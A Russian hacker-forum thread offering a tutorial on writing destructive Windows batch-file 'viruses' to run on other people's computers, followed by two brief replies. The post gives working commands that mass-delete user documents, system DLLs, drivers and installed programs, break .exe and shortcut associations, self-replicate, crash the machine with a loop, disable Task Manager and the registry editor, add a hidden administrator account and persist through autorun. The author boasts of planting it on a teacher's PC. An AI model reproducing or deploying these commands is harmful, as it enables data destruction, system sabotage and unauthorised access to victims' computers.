Хакерский форум

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Хакерский форум » Вирусы » Все про .bat


Все про .bat

Сообщений 1 страница 3 из 3

1

Для начала создадим текстовый документ и поменяем расширение на bat. Нажимаем команду "изменить" и пишем свой код

1)Выключение и перезагрузка ПК

shutdown -s -t 1 -c "lol" -f >nul -Форсированное выключение ПК.

Если добавить del *.* /q , то после запуска удалятся только файлы (не затронув папки) в той директории, где был запущен файл, т.е. запустили мы этот файл на рабочем столе, все ярлычки исчезли, но теперь уже навсегда. Если запустим файл в «Моих документах» то файлы исчезнут там. Но если поставить параметр /s то будет удаляться и в кататалогах и подкаталогах.
Параметр /q задаёт удаление без подтверждения.

shutdown -r -t 1 -c "lol" -f >nul -Форсираванная перезагрузка ПК

2)Теперь рассмотрим команду del.

Команда del направлена на удаление определённого файла, после неё в кавычках пишется полный путь к файлу, если вы хотите удалить из папки все файлы с расширением txt, например, то после название целевой папки и дроби нужно написать *.txt. Если нужно удалить что-нибудь из директории Windows, гораздо проще будет написать %SystemRoot%, вместо полного пути к директории, а уже затем вводить остальной путь.

Также получившийся вирус может самоуничтожаться:
del %0 -Эта команда удаляет сама себя, пишите её в самом конце вашего вируса и всё, ни кто не узнает, что вы испортили на его компе чтобы сразу эту пакость не исправить.

Командой del мы хоть и удаляем файлы, а папки то останутся, но есть команда которая стирает папки вместе с файлами:

rd C:windowsMedia /s /q

И все папочки и файлики удаляться. Вы спросите, ну если команда rd так хороша, зачем нужна команда del ? Ответ прост, вы попробуйте удалить командой rd , допустим только ярлыки рабочего стола, или только рисунки в папке windows. Командой del это делается так:

del C:windows*.bmp /q /s

Ну или можно удалить другие расширения, допустим надо удалить файлы .txt, то команда будет выглядеть так:

del C:windows*.txt /q /s

Файл можно ещё и просто не удаляя переместить, например:

move C:WINDOWS*.txt C:Text /y

Идём дальше Когда мы открываем диск С: мы видим не все файлы, которые там лежат, система их спрятала, для того чтобы их не тронул неопытный пользователь. Так вот раз они такие важные, а почему бы нам их не удалить…
Сделать это можно в два шага, сначала снять с нашего секретного файла атрибут системный и скрытый, а то нам не кто не позволит нечего удалять, а потом возьмем и удалим всё НЕНУЖНОЕ, то есть самое необходимое:

attrib -a -s -h -r C:*.*
del C:*.* /q

Но тут нам много удалить не дадут. Всё тристо раз защищено. =\

Можно, например, попробовать удалить установленные программы. Ну, так вот если мы знаем, что все программы по умолчанию записываются в папку Program Files то можно, например, написать вот такую команду:

rd %ProgramFiles% /s /q

А вот если написать:

rd C:Program Files /s /q

то вирус не сработает заявив что таких папок он не нашёл. Т.е. вирус будет искать папку "Program" и папку "Files". Ладно у нас есть зарезервированая команда для папки Program Files - %programfiles%. А если мы хотим удалить "Мои документы". То вирус будет искать папки "Мои" и "Документы". В этом случае нам помогут двойные кавычки. Можно удалить содержимое «Моих документов» тем более многие хранят там самое важное:

Chcp 1251
del "%USERPROFILE%Мои документы*.*" /q /s

Итак, вроде всё по команде del

Приведу ещё несколько примеров:

del C:windowsfonts /q >nul -удаляем шрифты. Правда не все шрифты удаляться системные останутся.

del "%SystemRoot%Media" /q >nul – Удалить системные звуки Windows

del "%SystemRoot%system32*.dll" /q >nul – Удалить все системные DLL(Динамические загружаемые библиотеки)

del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul – Удалить все драйверы, установленные на компьютере

del "%SystemRoot%Cursors*.*" >nul - Удалить курсоры

3)Теперь изменим расширение.

Кстати говоря, очень вредный вирус получиться, если поменять расширение. Вот например: ярлык, подумаешь… он мне и не нужен вовсе… но нет без ярлыков будет просто ужасно, вы только представьте чтобы сыграть в игру вам достаточно щелкнуть по ярлыку находящемуся на вашем рабочем столе, а когда ярлыка нет… вам надо лезть оч далеко, причём каждый раз, как хотим поиграть))). Ну вот я и подумал, почему бы не изменить расширение?

assoc .lnk=.avi

здесь показано, что я хочу поменять ярлык (расширение, как известно .lnk) на музыкальное расширение .avi и уже понятно, что ярлык с таким расширением ни куда вас не пошлёт! А вот вы комп будете долго посылать.… Ну и, конечно же, нетрудно догадаться, как такой вирусик может оказаться разрушительным, мы с вами поменяем приложение .exe и тогда ни одна программа, ни запуститься!!!

assoc .exe=.avi

тут показано расширение программ .exe я меняю его на .avi. Вы кстати можете придумать что-нибудь своё… например поменять jpg (рисунки) например на .virus вот весело будет когда он захочет посмотреть свои картинки…
можно же просто удалить расширение, не заменяя его на другое:

assoc .exe=

после знака = надо нажать один раз пробел, а уже потом сохранять наш вирусик.
В таблице я привёл некоторые основные расширения:

Приложение .exe .com
Текстовые файлы doc .txt .wp .diz .log .wri
Музыкальные файлы .mp3 .wav .avi .wmv .mpg
Картинки .bmp .jpg .gif .tif .pic
Ярлыки .lnk .url
Архиваторы .rar .zip .arj .cab lzh.
Шрифты fon .ttf .atm
Файл реестра .reg .key
Системные файлы .sys .dll .rnf .drv .ega
Файл справки .chm .hlp

4)Изменяем атрибуты файла или каталога.

Теперь напишем команду, которая не удаляет файлы, а просто ставит на них атрибут «Скрытый» и «Системный» и после запуска команды файлики исчезнут.
Просто пишем:

attrib +h +s

Используемые параметры в команде attrib:

+r Установка атрибута «Только чтение».
-r Снятие атрибута «Только чтение».
+a Установка атрибута «Архивный».
-a Снятие атрибута «Архивный».
+s Установка атрибута «Системный».
-s Снятие атрибута «Системный».
-h Снятие атрибута «Скрытый».
+h Установка атрибута «Скрытый».

Давайте для начала скроем папку WINDOWS,пишем:

attrib +h +s C:/WINDOWS

Или же можно скрыть файлы в самой папке:

attrib +h +s C:/WINDOWS/*.*

Можно поступить иначе:

cd C:windows -переходим в папку «windows»
attrib +h +s -и ставим атрибуты

У нас новая команда cd после неё пишем путь к директории и последующие команды будут применяться к этой папке. Почему надо ставить два атрибута? Достаточно поставить один "Скрытый" и он скроеться? В принципе да, но если вы поставили в свойствах папки "Показывать скрытые файлы и папки", то фишка не прокатит, а с двумя параметрами файл можно только увидеть в FAR, или Commander (это файловые менеджеры).

А если мы хотим снять все атрибуты со всех файлов в этом каталоге, да и ещё и подкаталог? Для снятия или назначение атрибутов в подкаталоги надо воспользоваться параметром /s. Например для снятия всех атрибутов со всех файлов в этой папке и всех её подпапках пишем:

attrib -r -s -h -a *.* /s

Вот ещё один параметр для снятия атрибутов с папок /d. Например если мы хотим снять атрибуты ну со всего что только возможно в папки "Windows" нам надо написать:

attrib -r -s -h C:WINDOWS*.* /s /d

Ну не обязательно именно эта папка можно такую команду применить для других папок.

5)Клонирование.

copy%0 эта команда копирует себя в другое место. Так можно наклонироваться по всему диск.

copy %0 C:virus.bat
copy %0 D:virus.bat
copy %0 C:windows/virus.bat
ну и.т.д.

6)Изменение даты и времени.

date 01.01.50 >nul -изменяем дату
time 0:00 >nul – Поставить время на 00:00

7)Вот команда которая запускает приложения, например:

start mspaint -открываем paint

В таблице написано приложение и команда которая его запускает:
Настройка системы - start msconfig
Калькулятор - calc
Помощь - start HelpCtr
Редактор символов - eudcedit
Таблица символов - charmap
Буфер обмена - clipbrd
Музон - dvdplay
Диспетчер задач - taskmgr
Громкость - sndvol32
Доктор Ватсон - drwatson
Отладчик доктора - drwtsn32
Дефрагментация диска С: - defrag C:
Проверка диска - chkdsk

8)Повесим комп.
А что если задать компу открыть сразу 50, или 100 Paint(ов) силёнок хватит не у всех. Можно конечно написать вот таких 100 строк: Start mspaint, но этого мы делать не будем. Мы напишет вот такое:

-ставим начальную точку
Start mspaint -пишем команду (в данном случае это открытие Paint(а)
goto x -говорим чтобы комп начинал всё с начальной точки

Этим самым у нас получаеться безконечный цикл открытия приложения и попытка зависания компа.

9)Так же можно передать привет жертве =)
Итак, пишем:

msg * "Текст сообщения" >nul – показываем Windows-стилизованное сообщение с кнопкой ОК, кавычки не надо...

Чуть не забыл, если вы хотите что бы собщение было на русском языке надо прописать эту команду:
chcp 1251 -изменение кодовой страницы, т.е. это будет выглядеть так:

chcp 1251
msg * Привет!

Теперь изпользуем с командой, так сказать бесконечного цикла:

chcp 1251
msg * Куку =)
chcp 1251
msg * Ты меня не закроешь
chcp 1251
msg * Можешь не стараться ламерок
goto x

8)Создаём мусор, а точней большое кол-во папок) Команда md
Просто пишем:
md1
md2
md3 и т.д.

10)Ещё можно переименовать диски)

Chcp 1251
label D: Дурак

11)Кроме стандартного сообщения, можно передать привет создав файл блокнот:

Chcp 1251
echo virus.bat>>read.txt Привет
start/max read.txt
Chcp 1251
echo virus.bat>>lamer.txt Дурак, пока ты меня читаешь, вирус работает!
start/max lamer.txt

/max -открываем на весь экран

Команд существует ещё множество =)

В конец я приведу ещё несколько команд, которые вам возможно пригодятся:

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul – Запретить комбинацию клавиш Ctrl-Alt-Del

%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul – Поменять местами значения кнопок мыши

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies ExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul – Делает невозможным запуск приложений

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul – Запретить редактирование реестра вручную

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul – Запретить вызов панели кправления

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul – Убрать рабочий стол

taskkill /f /im explorer.exe >nul – Убить процесс Explorer.exe (кроме Explorer можно написать любой процесс)

net share "ResName"="C:" >nul – Расшарить диск C:

chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y -создаём нового пользователя, с правами администратора, логин:hacker и пароль:hack

chcp 1251
copy ""%0"" "%SystemRoot%\system32\virus.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n" /v "virus" /t REG_SZ /d "%SystemRoot%\system32\virus.bat" /f >nul -записываем в автозагрузку

или же можно по другому:

REG QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon
IF ERRORLEVEL 1 GOTO LABEL1
IF ERRORLEVEL 0 GOTO LABEL2
GOTO END
:LABEL1
copy %0 "%systemroot%\winlogon.cmd"
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %systemroot%\winlogon.cmd
GOTO END
:LABEL2
тут_пишем_свой_код
:END
exit

т.е. вирус называем winlogon.bat, при первом запуске вирус записывается в автозагрузку, а при следующем запуске ПК, вирус выполняет вами написанный код (я это использовал на информатике, что бы училка не спалила, кто ей вирус закинул XD).
А удалит это творчество следующий код:

REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /f
DEL /F /Q "%systemroot%\winlogon.cmd"

Ну вот вроде и всё, ах да, не забывайте перед началом вируса прописывать:
@echo off -отключает режим отображения команд на экране

Статья не моя, нашел на юкоз сайте, токо забыл где :crazyfun:

0

2

А как убрать  чёрный экран , когда я запускаю его , строки бегут длинные , а я в любой момент мог нажать крестик.

0

3

отличная инфа для новичка

0


Вы здесь » Хакерский форум » Вирусы » Все про .bat